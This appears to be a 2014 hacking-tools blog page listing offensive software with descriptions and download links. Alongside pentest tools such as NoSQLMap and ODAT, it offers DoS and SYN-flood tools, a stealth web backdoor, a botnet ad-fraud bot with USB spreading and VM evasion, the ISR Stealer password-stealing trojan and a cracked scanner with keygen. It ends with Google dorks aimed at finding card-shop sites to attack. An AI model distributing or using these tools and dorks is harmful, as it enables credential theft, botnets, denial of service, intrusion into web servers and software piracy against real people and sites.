Wednesday, July 9, 2014

NoSQLMap




Introduction

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.
It is named as a tribute to Bernardo Damele and Miroslav Stampar's popular SQL injection tool sqlmap, and its concepts are based on, and are extensions of, Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL-based platforms such as CouchDB, Redis, and Cassandra is planned in future releases.

Requirements

On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap's dependencies.
Requirements vary based on the features used:
  • Metasploit Framework
  • Python with PyMongo
  • httplib2
  • urllib
  • A local, default MongoDB instance for cloning databases to. Check here for installation instructions.
Various other libraries are required that a normal Python installation should have readily available. Your mileage may vary; check the script.

Setup

An experimental setup.sh script for Debian and Red Hat based systems is included. Any feedback or suggestions on improving this process is welcome.

Download

https://github.com/tcstool/NoSQLMap

Usage

Start with
./nosqlmap.py
or
python nosqlmap.py
NoSQLMap uses a menu-based system for building attacks. Upon starting NoSQLMap you are presented with the main menu:
1-Set options (do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit
Explanation of options:
1. Set target host/IP-The target web server (i.e. www.google.com) or MongoDB server you want to attack.
2. Set web app port-TCP port for the web application if a web application is the target.
3. Set URI Path-The portion of the URI containing the page name and any parameters but NOT the host name (e.g. /app/acct.php?acctid=102).
4. Set HTTP Request Method (GET/POST)-Set the request method to a GET or POST; Presently only GET is implemented but working on implementing POST requests exported from Burp. 
5. Set my local Mongo/Shell IP-Set this option if attacking a MongoDB instance directly to the IP of a target Mongo installation to clone victim databases to or open Meterpreter shells to.
6. Set shell listener port-If opening Meterpreter shells, specify the port.
7. Load options file-Load a previously saved set of settings for 1-6.
8. Load options from saved Burp request-Parse a request saved from Burp Suite and populate the web application options.
9. Save options file-Save settings 1-6 for future use.
x. Back to main menu-Use this once the options are set to start your attacks.

GoldenEye Layer 7

GoldenEye is an HTTP/S Layer 7 Denial-of-Service testing tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist the socket connection, busting through caching (when possible), until it consumes all available sockets on the HTTP/S server.

This project was started under the influence of Barry Shteiman, who created HULK, a proof-of-concept tool that I decided to improve and which later became GoldenEye.

This software is written purely in Python.

* Some users report that GoldenEye also runs 100% stable on Mac's and Windows's Python.

Usage
==================================
USAGE: ./goldeneye.py <url> [OPTIONS]

OPTIONS:
========================================
    Flag               Description                                      Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help
Utilities
==================================================
util/getuas.py – Fetches user-agent lists from http://www.useragentstring.com/pages...gentstring.php subpages (ex: ./getuas.py http://www.useragentstring.com/pages/Browserlist/). Requires BeautifulSoup4.
res/lists/useragents – Text lists (one per line) of User-Agent strings (from http://www.useragentstring.com)

Changelog
=====================================================
2014-02-20 Added randomly created user agents (still RFC compliant).
2014-02-19 Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.
2013-03-26 Changed from threading to multiprocessing. Still has some bugs to resolve, like I still don't know how to properly shut down the manager.
2012-12-09 Initial release


Download:
==============================
https://github.com/jseidl/GoldenEye

LEGAL NOTICE
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.

PyHttpShell

PyHttpShell is a proof of concept with very simple and basic features; it was written in Python 2.7 and PHP.


Features
#######################################
Transport over HTTP/HTTPS.
Supports System Proxy Settings.
Multiple Hosts/Connections.
Download files to client machine.
Change Sleep time remotely.
Works on Win/MAC/Linux

Source
#############################
http://sourceforge.net/projects/pyhttpshell/

NetStress-NG DDOS


Description
###########################################
Syn Flood Attacks
==============================
SYNFlood with static source port
SYNFlood with random source port
SYNFlood with static source ip address
SYNFlood with random source address
SynFlood with fragmented packets

ACK Flood Attacks
===============================
ACK Flood with static source port
ACK Flood with random source port
ACK Flood with static source ip address
ACK Flood with random source address
ACK Flood with fragmented packets

FIN Flood Attacks
===============================
FIN Flood with static source port
FIN Flood with random source port
FIN Flood with static source ip address
FIN Flood with random source address
FIN Flood with fragmented packets

UDP Flood Attacks
===============================
Static source port udp flood
UDP flood with random source port
UDP Flood with static source ip address
UDP Flood with random source address
UDP Flood with fragmented packets

ICMP Flood
========================================
ICMP Flood with all options random (source ip, icmp type, code)
HTTP Flood

Source
###################################
http://sourceforge.net/projects/netstressng/

Assassin V1.0 - BurpSuite Plugin

Assassin V1.0 - BurpSuite Plugin
###################################################
This plugin currently has only two functions: one is a side note, the other is a subdomain brute-forcer.

It looks like nobody in China has published a Burp plugin so far; one may well have been written long ago and be in private use by others.

Later, more information-detection functions will be added to this tool, for example web fingerprint identification, port detection, and automated use of vulnerabilities.



Download
#####################
https://www.dropbox.com/s/oxfjj4eqwblj7yn/BurpSuite%20AssassinV1.0.rar

Heartbeat Scanner (Exploit CVE-2014-0160) [Python]

A Python script that scans for the CVE-2014-0160 vulnerability.

Download
##################################
http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip

WebPwn3r


Description:
###########################################
WebPwn3r - Web Applications Security Scanner.

In its public demo version, WebPwn3r has the following features:

1- Scan a URL or a list of URLs.
2- Detect and exploit Remote Code Injection vulnerabilities.
3- Detect and exploit Remote Command Execution vulnerabilities.
4- Detect and exploit typical XSS vulnerabilities.
5- Detect WebKnight WAF.
6- Improved payloads to bypass security filters/WAFs.
7- Fingerprint the backend technologies.

WebPwn3r:
###############################
https://github.com/zigoo0/webpwn3r

Video: Yahoo! RCE Detector WebPwn3r
######################################
https://www.youtube.com/embed/B6kDUk-ehOE?wmode=opaque

Bypass Adfly by Metal

Bypass Adfly by Metal 


Download
#########################
http://www.datafilehost.com/d/68ca9006

Social-Engineer Toolkit (SET) v6.0 Pre-Release Training

Social-Engineer Toolkit (SET) v6.0 Pre-Release Training
##############################################
Free Webinar: Social-Engineer Toolkit (SET) v6.0 Pre-Release Training



TrustedSec is hosting a free pre-release webinar / training session to discuss the features of the upcoming major release of The Social-Engineer Toolkit (SET) v6.0, codename: Rebellion. This new version has a number of enhancements, new exploits, attack vectors, and much more. The final version of SET v6.0 will be released on May 17th, 2014 at BSIDES Cincinnati; however, this webinar offers a sneak peek, covering the different attack vectors and how best to utilize SET.

* info
The webinar will be provided through David Kennedy, the creator of SET and CEO of TrustedSec. The following areas will be discussed:

* New features in SET
* How to best use the new features
* How to utilize SET for different attack vectors
* Walkthrough of the different features both old and new and how to best apply them for a successful SE

The webinar is FREE and open to the public. Note that we expect this to go quick. Register now for the free webinar below:

Source
##########################
https://www.trustedsec.com/may-2014/free-webinar-social-engineer-toolkit-set-v6-0-pre-release-training/

Minisplo1t v.2 Final RELEASE

Minisplo1t v.2 Final RELEASE


How to :
#######################################
Download the file by clicking the download button below.

Save it in the root directory.

Extract the file:

tar -xvf Minisploi-v2-Final.tar

Change the file permission:

chmod +x Minisploit-Final/minisplo1t.sh

Start Minisploit:

cd Minisploit-Final/
./minisplo1t.sh

Download
#################
http://sourceforge.net/projects/hidemichi/files/latest/download?source=files

HQLmap

HQLmap
################
This project has been created to exploit HQL injections. The tool has been written in Python and is released under the MIT License. Future development: I have in mind to develop a specific module for SQLmap.

Source
################
https://github.com/PaulSec/HQLmap

Acunetix Web Vulnerability Scanner (WVS v9.5) with Keygen

Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

This week the latest version was released, Acunetix Vulnerability Scanner 9.5.

Features :
###################
- AcuSensor Technology
- Industry’s most advanced and in-depth SQL injection and Cross site scripting testing
- Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
- Visual macro recorder makes testing web forms and password protected areas easy
- Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
- Extensive reporting facilities including PCI compliance reports
- Multi-threaded and lightning fast scanner – processes thousands of pages with ease
- Intelligent crawler detects web server type, application language and smartphone-optimized sites.
- Acunetix crawls and analyzes different types of websites including HTML5, SOAP and AJAX
- Port scans a web server and runs security checks against network services running on the server

Download
#################
http://www.datafilehost.com/d/27bfdcdb

KeyGen
##########################
http://www.datafilehost.com/d/741bfc40

xSecurity WordPress Brute Force MultiThreading Python


Download
###########
http://pastebin.com/raw.php?i=4BV4Kj0a

WeBaCoo (Web Backdoor Cookie)

WeBaCoo (Web Backdoor Cookie)
#########################
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post-exploitation tool to maintain access to a compromised web server.

WeBaCoo was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealth mechanism to execute commands on the compromised server. The obfuscated communication is accomplished using the HTTP header's Cookie fields under valid client HTTP requests and the corresponding web server responses.

The script-kit has two main operation modes: Generation and “Terminal”. Using generation mode, the user can create the backdoor code containing the PHP payloads. In the remote “terminal” mode, on the other hand, the client can connect to the compromised server where the backdoor PHP code has been injected. In order to establish the remote “pseudo”-shell, the user must provide the server’s URL path containing the injected code.


Source
###############
https://github.com/anestisb/WeBaCoo/zipball/master

JY Adfly Bot - The Moneymaking Bot

Make unlimited money with your botnet or other spreading methods!

Information
####################

This bot is used to make money with Adfly. All registered Adfly links are automatically called in the background whenever a victim's PC boots.

Connections to the IP address 77.66.30.215 must be blocked before use of tools! For this purpose, a firewall or the hosts file can be used.

Features
###########
Up to 6 Adfly links
USB spread
StartUp function
Icon Changer
Bypass VM & Snubis
process Killer

Download
#################
https://www.dropbox.com/s/cegiehasobrgi1m/JY_Adfly_Bot.rar

XSSYA(Cross Site Scripting Scanner & Vulnerability Confirmation)

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation tool (working in two methods):
• Method number 1 for confirmation: request and response
• Method number 2 for confirmation: execute the encoded payload and search for the same payload, decoded, in the web HTML code
• Supports HTTPS
• After confirmation (execute payload to get cookies)
• Identifies 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
• Can be run on (Windows - Linux)
XSSYA contains a library of encoded payloads to bypass WAF (Web Application Firewall). It also supports saving the web HTML code before executing the payload, and viewing the web HTML code on the screen or terminal.
$ python xssya.py
Links should end with (/ or = or ?)
Example
$ python xssya.py
http://www.domain.com/ http://www.domain.com= http://www.domain.com?
The only module that needs to be downloaded is colorama-0.2.7: https://pypi.python.org/pypi/colorama
Note: Crawling (needs to be enhanced)

Source
#############
https://github.com/yehia-mamdouh/XSSYA

ODAT (Oracle Database Attacking Tool)

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests Oracle database security remotely.
Usage examples of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)

Features
search valid SID on a remote Oracle Database listener via: a dictionary attack/a brute force attack/ALIAS of the listener
search Oracle accounts using: a dictionary attack/each Oracle user like the password
execute system commands on the database server using: DBMS_SCHEDULER/JAVA/external tables/oradbg
download files stored on the database server using: UTL_FILE/external tables/CTXSYS
upload files on the database server using: UTL_FILE/DBMS_XSLPROCESSOR/DBMS_ADVISOR
delete files using: UTL_FILE
send/receive HTTP requests from the database server using: UTL_HTTP/HttpUriType
scan ports of the local server or a remote server using: UTL_HTTP/HttpUriType/UTL_TCP
exploit the CVE-2012-313 (CVE-2012-3137 : The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 all)

Install/Dependencies
ODAT is compatible with Linux only. A standalone version exists so that you do not need to install dependencies and sqlplus (see the build folder of the git repository). The ODAT standalone has been generated thanks to pyinstaller.
If you want to have the development version installed on your computer, the following tools and dependencies are needed:
Language: Python 2.7
Oracle dependencies: Instant Oracle basic & Instant Oracle sdk
Python libraries: cx_Oracle with the following recommended – colorlog/termcolor/argcomplete/pyinstaller

Source
###############
https://github.com/quentinhardy/odat

New CC SHOP Dorks 2014
##################################
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys" 

inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

Monday, July 7, 2014

######################################################
#ISR Stealer 0.4.1 (New Version Clean & Work 100%)
######################################################
#Made in:       Romania, Europe
#Release date:  20.08.2012
#Gfx by:        Y.xakep and Tinkode
#Credits:       Cobein, 7, Bilal Ghouri, SqUeEzEr, Rtflol and Nirsoft team.
#Beta testers : linuxgirl, zippy and wav3
#Developed for: TrojanForge.com and InSecurity.Ro


#Options:
+Send logs to my sql data base(php)
+Change server icon
+Steal options:
Internet Explorer (All Versions)
Mozilla Firefox (All Versions)
Google Chrome (All Versions)
Opera (All Versions)
Safari (All Versions)
VPN/Network Accounts
Yahoo Messenger 8/9/10 Password
Msn Messenger
Pidgin
Filezilla
Internet Download Manager (IDM)
jDownloader
Trillian

######################################################
#Coded by BUNNN
######################################################
Update 0.4.1
Added password recovery for:
+Outlook Express
+Microsoft Outlook 2000/2002/2003/2007/2010
+Windows Mail, Windows Live Mail
+IncrediMail
+Eudora
+Netscape 6.x/7.x
+Mozilla Thunderbird
+Group Mail Free
+Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
+Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
+Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
======================================================
How To Set Up ISR Stealer
################
Download Links
======================
Mediafire Link
===========
https://www.mediafire.com/?78bmbmmxcm7o02e

Dropbox Download Link
===================
https://www.dropbox.com/s/nfgdkp9q1t078ni/ISR%20Stealer%200.4.1.rar?

Ziddu Download Link
====================
http://downloads.ziddu.com/download/23890840/ISR-Stealer-0.4.1.rar.html